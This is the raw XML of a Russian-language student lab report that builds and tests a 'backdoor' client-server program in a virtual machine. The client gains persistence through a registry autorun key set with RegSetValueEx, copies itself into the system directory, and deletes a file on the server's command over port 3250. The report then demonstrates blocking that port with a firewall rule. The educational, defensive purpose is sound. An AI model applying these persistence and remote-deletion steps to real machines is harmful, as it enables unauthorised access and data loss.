        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">определен до программы. Вместо </w:t>
      </w:r>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RegOpenKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">возможно использование функции </w:t>
      </w:r>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RegCreateKey</w:t>
      </w:r>
      <w:r>
        <w:t>. Данная функция сразу создает нужный раздел указанного типа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42382468" w14:textId="5095BF89" w:rsidR="00F426D0" w:rsidRDefault="00F426D0" w:rsidP="00C045FB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2835"/>
          <w:tab w:val="left" w:pos="3261"/>
        </w:tabs>
        <w:ind w:firstLine="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Result = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RegSetValueEx(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Key, REG_NAME, 0, REG_SZ, WIN_PATH, sizeof(WIN_PATH) + 1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - переменной присваивается результат, подразумевающий успешность выполненной операции по установлению указанного значения WIN_PATH типа </w:t>
      </w:r>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>REG_SZ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в открытом по пути Key разделу </w:t>
      </w:r>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>REG_NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WIN_PATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">содержит адрес программы для автозапуска, </w:t>
      </w:r>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>REG_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>- имя раздела</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED976F4" w14:textId="24834500" w:rsidR="00F426D0" w:rsidRDefault="00F426D0" w:rsidP="00C045FB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2977"/>
        </w:tabs>
        <w:ind w:firstLine="850"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RegCloseKey(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Key)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - функция, закрывающая раздел по указанному ключу</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CD2E56" w14:textId="32777076" w:rsidR="00595998" w:rsidRDefault="00595998" w:rsidP="00C045FB">
      <w:pPr>
        <w:ind w:firstLine="850"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B2222D4" w14:textId="2A381E80" w:rsidR="00595998" w:rsidRDefault="00595998" w:rsidP="00C045FB">
      <w:pPr>
        <w:ind w:firstLine="850"/>
      </w:pPr>
      <w:r>
        <w:t>Исследуем программу после нововведений</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B79ABAE" w14:textId="0B25C6DD" w:rsidR="00F00755" w:rsidRDefault="00F00755" w:rsidP="00C045FB">
      <w:pPr>
        <w:ind w:firstLine="850"/>
      </w:pPr>
      <w:r>
        <w:t>Изначальное состояние ОС на виртуальной машине до запуска сервера на компьютере и клиента на виртуальной машине:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BC272E" w14:textId="77777777" w:rsidR="00F00755" w:rsidRDefault="00F00755" w:rsidP="00C045FB">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="850"/>
      </w:pPr>
      <w:r>
        <w:t>Отсутствие exe-файла Client в системном каталоге</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E37B1A8" w14:textId="77777777" w:rsidR="00F00755" w:rsidRDefault="00F00755" w:rsidP="00C045FB">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="850"/>
      </w:pPr>
      <w:r>
        <w:t>Отсутствие процесса Client в диспетчере задач</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A7385F" w14:textId="77777777" w:rsidR="00F00755" w:rsidRDefault="00F00755" w:rsidP="00C045FB">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="850"/>
      </w:pPr>
      <w:r>
        <w:t>Отсутствие в реестре раздела, отвечающего за автозапуск программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2A7325" w14:textId="02253C19" w:rsidR="00F00755" w:rsidRDefault="00F00755" w:rsidP="00C045FB">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="850"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Есть файл, который необходимо удалить. Это файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IMPORTANT</w:t>
      </w:r>
      <w:r>
        <w:t>.txt, находящийся по адресу C:\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>important</w:t>
      </w:r>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IMPORTANT</w:t>
      </w:r>
      <w:r>
        <w:t>.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F6E2F3" w14:textId="1A903C18" w:rsidR="00F00755" w:rsidRDefault="00F00755" w:rsidP="00F426D0">
      <w:pPr>
        <w:ind w:left="284" w:firstLine="850"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="106C7988" w14:textId="0EBC315F" w:rsidR="00F00755" w:rsidRDefault="00427460" w:rsidP="00C045FB">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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194746" wp14:editId="24C181D9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3563347</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6012180" cy="294005"/>
                <wp:effectExtent l="0" t="0" r="7620" b="0"/>
                <wp:wrapTopAndBottom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180" cy="2940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01BF9" w14:textId="559A3A08" w:rsidR="00427460" w:rsidRDefault="00427460" w:rsidP="00427460">
                            <w:pPr>
                              <w:pStyle w:val="aff"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:bCs w:val="0"/>
                                <w:noProof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>Рисунок 3 – До заражения компьютера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194746" id="Надпись 11" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:280.6pt;width:473.4pt;height:23.1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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="51D01BF9" w14:textId="559A3A08" w:rsidR="00427460" w:rsidRDefault="00427460" w:rsidP="00427460">
                      <w:pPr>
                        <w:pStyle w:val="aff"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b w:val="0"/>
                          <w:bCs w:val="0"/>
                          <w:noProof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>Рисунок 3 – До заражения компьютера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E676C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43B8FE01" wp14:editId="62364A12">
            <wp:extent cx="6299835" cy="354393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2911" w14:textId="376DBFB7" w:rsidR="007E676C" w:rsidRDefault="00F00755" w:rsidP="00187B79">
      <w:r>
        <w:t xml:space="preserve">Запускаем сервер и клиент от имени администратора для удаления файла и копирования клиента в системный каталог. В диспетчере задач появился процесс клиента. Указываем адрес файла для удаления. Также мы видим, что в реестре появился нужный раздел и в системном каталоге появился exe-файл Client </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A960007" w14:textId="38D40840" w:rsidR="00F00755" w:rsidRPr="00C13ABB" w:rsidRDefault="00C13ABB" w:rsidP="00187B79">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:t>При перезагрузке в диспетчере задач видим фоновый процесс Client.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CC9448" w14:textId="394D3EF1" w:rsidR="00C045FB" w:rsidRDefault="00187B79" w:rsidP="00187B79">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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764C27" wp14:editId="02DEFE46">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3554730</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6012180" cy="294005"/>
                <wp:effectExtent l="0" t="0" r="7620" b="0"/>
                <wp:wrapTopAndBottom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180" cy="2940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65FC" w14:textId="3D935C2E" w:rsidR="00427460" w:rsidRDefault="00427460" w:rsidP="00427460">
                            <w:pPr>
                              <w:pStyle w:val="aff"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:bCs w:val="0"/>
                                <w:noProof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>Рисунок 4 – Демонстрация работы модифицированной программы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764C27" id="Надпись 12" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:279.9pt;width:473.4pt;height:23.1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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="365465FC" w14:textId="3D935C2E" w:rsidR="00427460" w:rsidRDefault="00427460" w:rsidP="00427460">
                      <w:pPr>
                        <w:pStyle w:val="aff"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b w:val="0"/>
                          <w:bCs w:val="0"/>
                          <w:noProof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>Рисунок 4 – Демонстрация работы модифицированной программы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00755">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0619EEB3" wp14:editId="653227C2">
            <wp:extent cx="6299835" cy="354393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F816D" w14:textId="321A84AB" w:rsidR="00023B0A" w:rsidRDefault="00C045FB" w:rsidP="00187B79">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="851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4FBB77" wp14:editId="29F374B2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4476750</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6012180" cy="294005"/>
                <wp:effectExtent l="0" t="0" r="7620" b="0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180" cy="2940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D78CEA" w14:textId="54C8EE0A" w:rsidR="00427460" w:rsidRDefault="00427460" w:rsidP="00427460">
                            <w:pPr>
                              <w:pStyle w:val="aff"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:bCs w:val="0"/>
                                <w:noProof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>Рисунок 5 – Список открытых портов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4FBB77" id="Надпись 13" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:352.5pt;width:473.4pt;height:23.1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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="00D78CEA" w14:textId="54C8EE0A" w:rsidR="00427460" w:rsidRDefault="00427460" w:rsidP="00427460">
                      <w:pPr>
                        <w:pStyle w:val="aff"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b w:val="0"/>
                          <w:bCs w:val="0"/>
                          <w:noProof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>Рисунок 5 – Список открытых портов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490E">
        <w:t xml:space="preserve">Зафиксируем список открытых сетевых портов. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r w:rsidR="0026490E">
        <w:t>командную строку введём</w:t>
      </w:r>
      <w:r w:rsidR="0026490E" w:rsidRPr="0026490E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0026490E" w:rsidRPr="0026490E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netstat -aon.</w:t>
      </w:r>
      <w:r w:rsidR="0026490E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0026490E" w:rsidRPr="0026490E">
        <w:t>Видим</w:t>
      </w:r>
      <w:r w:rsidR="0026490E">
        <w:t xml:space="preserve"> снимке представлены состояния до и после подключения клиента к серверу.</w:t>
      </w:r>
      <w:r w:rsidR="00023B0A">
        <w:t xml:space="preserve"> Видим, что клиент и сервер </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">взаимодействуют </w:t>
      </w:r>
      <w:r w:rsidR="00023B0A">
        <w:t>через порт 3250.</w:t>
      </w:r>
      <w:r w:rsidR="0026490E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21F26A60" wp14:editId="6BE7A6CF">
            <wp:extent cx="6172200" cy="34721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679" cy="347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2E10" w14:textId="328528B7" w:rsidR="00C045FB" w:rsidRDefault="00023B0A" w:rsidP="00187B79">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="851"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Заблокируем работу этого порта.</w:t>
      </w:r>
      <w:r w:rsidR="00427460" w:rsidRPr="00427460">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C12BCA8" w14:textId="77777777" w:rsidR="00187B79" w:rsidRDefault="00187B79" w:rsidP="00187B79">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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A1D991" wp14:editId="415E920D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3594191</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6012180" cy="294005"/>
                <wp:effectExtent l="0" t="0" r="7620" b="0"/>
                <wp:wrapTopAndBottom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180" cy="2940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249880" w14:textId="02562DA1" w:rsidR="00427460" w:rsidRPr="00C045FB" w:rsidRDefault="00427460" w:rsidP="00427460">
                            <w:pPr>
                              <w:pStyle w:val="aff"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:b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 w:rsidR="00C045FB">
                              <w:rPr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>6</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr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– </w:t>
                            </w:r>
                            <w:r w:rsidR="00C045FB">
                              <w:rPr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>Демонстрация защиты от несанкционированного доступа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A1D991" id="Надпись 14" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:283pt;width:473.4pt;height:23.1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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="00249880" w14:textId="02562DA1" w:rsidR="00427460" w:rsidRPr="00C045FB" w:rsidRDefault="00427460" w:rsidP="00427460">
                      <w:pPr>
                        <w:pStyle w:val="aff"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b w:val="0"/>
                          <w:b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 xml:space="preserve">Рисунок </w:t>
                      </w:r>
                      <w:r w:rsidR="00C045FB">
                        <w:rPr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>6</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr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 xml:space="preserve"> – </w:t>
                      </w:r>
                      <w:r w:rsidR="00C045FB">
                        <w:rPr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>Демонстрация защиты от несанкционированного доступа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045FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D79147F" wp14:editId="519497C0">
            <wp:extent cx="6299835" cy="354393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4B7B1" w14:textId="352B601B" w:rsidR="00023B0A" w:rsidRDefault="00023B0A" w:rsidP="00187B79">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="851"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Включим в брандмауэре правило «ЛАБОРАТОРНАЯ РАБОТА 4», которое заблокирует порт 3250, используемый клиентом и сервером. Также удалим раздел в реестре для автозапуска Client.exe, вернем все файлы. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0464A58B" w14:textId="6CD52B4F" w:rsidR="0026490E" w:rsidRPr="00C13ABB" w:rsidRDefault="00023B0A" w:rsidP="00187B79">
      <w:r>
        <w:t xml:space="preserve">Запустим клиент и сервер снова. Как видно, процесс сервера и клиента запущен, раздел в реестре снова появился. Однако сервер не соединился с клиентом, а значит отсутствует возможность удаления файла. Тем не менее, программа-клиент </w:t>
      </w:r>
      <w:r w:rsidR="00E044E7">
        <w:t>запускается</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> автоматически, а это значит, что при снятии блокировки с порта она снова сможет удалить файл.</w:t>
      </w:r>
      <w:r w:rsidR="00C13ABB">
        <w:t xml:space="preserve"> При отключении правила соединение</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C13ABB">
        <w:t xml:space="preserve">восстанавливается. Мы можем удалить файл </w:t>
      </w:r>
      <w:r w:rsidR="00C13ABB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IMPORTANT</w:t>
      </w:r>
      <w:r w:rsidR="00C13ABB" w:rsidRPr="00C13ABB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C13ABB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:r w:rsidR="00C13ABB" w:rsidRPr="00C13ABB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B3101C" w14:textId="25E7578E" w:rsidR="00C13ABB" w:rsidRDefault="00C045FB" w:rsidP="00187B79">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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44B7BB" wp14:editId="290F11B8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3607979</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6012180" cy="294005"/>
                <wp:effectExtent l="0" t="0" r="7620" b="0"/>
                <wp:wrapTopAndBottom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180" cy="2940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498B2E" w14:textId="0889B4BC" w:rsidR="00C045FB" w:rsidRPr="00C045FB" w:rsidRDefault="00C045FB" w:rsidP="00C045FB">
                            <w:pPr>
                              <w:pStyle w:val="aff"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:b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000000" w:themeColor="text1"/>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t>Рисунок 6 – Удаление файла после отключения защиты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44B7BB" id="Надпись 15" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:284.1pt;width:473.4pt;height:23.1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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="22498B2E" w14:textId="0889B4BC" w:rsidR="00C045FB" w:rsidRPr="00C045FB" w:rsidRDefault="00C045FB" w:rsidP="00C045FB">
                      <w:pPr>
                        <w:pStyle w:val="aff"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b w:val="0"/>
                          <w:b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b w:val="0"/>
                          <w:bCs w:val="0"/>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t>Рисунок 6 – Удаление файла после отключения защиты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6490E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6105EC84" wp14:editId="37A77D9E">
            <wp:extent cx="6299835" cy="3543935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14DC" w14:textId="29D912C3" w:rsidR="006162CC" w:rsidRPr="006A5F64" w:rsidRDefault="00000000" w:rsidP="00187B7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851"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F60A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Выводы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6684DC8A" w14:textId="420FE26F" w:rsidR="00713B10" w:rsidRDefault="00C13ABB" w:rsidP="00187B79">
      <w:r>
        <w:t xml:space="preserve">В ходе лабораторной работы удалось выяснить, что “потайные ходы” являются очень опасными уязвимостями, так как они незаметны, дают доступ к любой информации, находящейся у пользователя на устройстве, этот доступ может быть использован для безвозвратного удаления информации. </w:t>
      </w:r>
      <w:r w:rsidR="00713B10">
        <w:t>Но если отслеживать используемые порты и блокировать те, которыми пользуется шпионское ПО, то можно обезопасить данные пользователя от несанкционированного доступа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A097E6" w14:textId="120D8582" w:rsidR="002D5B1E" w:rsidRDefault="002D5B1E" w:rsidP="00C13ABB">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="779BDEB0" w14:textId="441CBA7A" w:rsidR="006A5F64" w:rsidRDefault="006A5F64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846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6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006A5F64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>От</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>веты на контрольные вопросы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6653A071" w14:textId="77777777" w:rsidR="002D5B1E" w:rsidRPr="002D5B1E" w:rsidRDefault="002D5B1E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  <w:r w:rsidRPr="002D5B1E">
        <w:t>1. Какие угрозы несут потайные ходы?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599B14E8" w14:textId="4D23D10D" w:rsidR="002D5B1E" w:rsidRPr="002D5B1E" w:rsidRDefault="002D5B1E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  <w:r w:rsidRPr="002D5B1E">
        <w:t xml:space="preserve">Потайной   ход   позволяет удалять   файлы   с   пораженного </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002D5B1E">
        <w:t>компьютера,  позволяет</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002D5B1E">
        <w:t xml:space="preserve">   получить   удаленный   доступ   к   реестру,   производить системные операции: создание новых сетевых ресурсов, модификацию паролей и</w:t>
      </w:r>
      <w:r w:rsidR="001F7336">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D5B1E">
        <w:t>т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DF5AF5" w14:textId="642C84EC" w:rsidR="002D5B1E" w:rsidRPr="002D5B1E" w:rsidRDefault="002D5B1E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  <w:r w:rsidRPr="002D5B1E">
        <w:t>2. Как можно обнаружить потайной ход, если он открывает порт только</w:t>
      </w:r>
      <w:r w:rsidR="001F7336">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D5B1E">
        <w:t>на короткие промежутки времени, которые заранее неизвестны?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F560D10" w14:textId="0A710E41" w:rsidR="002D5B1E" w:rsidRPr="002D5B1E" w:rsidRDefault="002D5B1E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  <w:r w:rsidRPr="002D5B1E">
        <w:t>Для   того,</w:t>
      </w:r>
      <w:r w:rsidR="001F7336">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D5B1E">
        <w:t xml:space="preserve">чтобы   обнаружить   потайной   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002D5B1E">
        <w:t xml:space="preserve">ход,   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
